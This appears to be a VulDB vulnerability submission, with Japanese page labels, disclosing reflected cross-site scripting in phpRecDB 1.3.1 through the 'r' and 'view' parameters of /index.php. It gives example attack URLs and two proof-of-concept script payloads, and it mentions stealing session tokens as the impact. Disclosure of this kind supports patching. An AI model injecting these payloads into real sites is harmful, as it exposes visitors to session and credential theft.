| タイトル | phpRecDB 1.3.1 - Reflected XSS |
|---|
| 説明 | # Exploit Title: phpRecDB 1.3.1 - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 30/07/2023
# Vendor: phprecdb.com
# Vendor Homepage: http://www.phprecdb.com/
# Software Link: http://www.phprecdb.com/demo/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /index.php
GET parameter 'r' is vulnerable to XSS
http://website/index.php?ajax=yw0&r=site%2fpage[XSS]&sort=Artist&view=news
XSS Payload: ov8mn<img src=a onerror=alert(1)>expro
Path: /index.php
GET parameter 'view' is vulnerable to XSS
http://www.website/index.php?ajax=yw0&r=site%2Fpage&sort=Artist&view=news[XSS]
XSS Payload: p96xr<script>alert(1)</script>axjwn
[-] Done |
|---|
| ユーザー | skalvin (UID 49463) |
|---|
| 送信 | 2023年07月30日 00:38 (3 年 ago) |
|---|
| モデレーション | 2023年08月15日 12:09 (16 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 237194 [phpRecDB 1.3.1 /index.php r/view クロスサイトスクリプティング] |
|---|
| ポイント | 17 |
|---|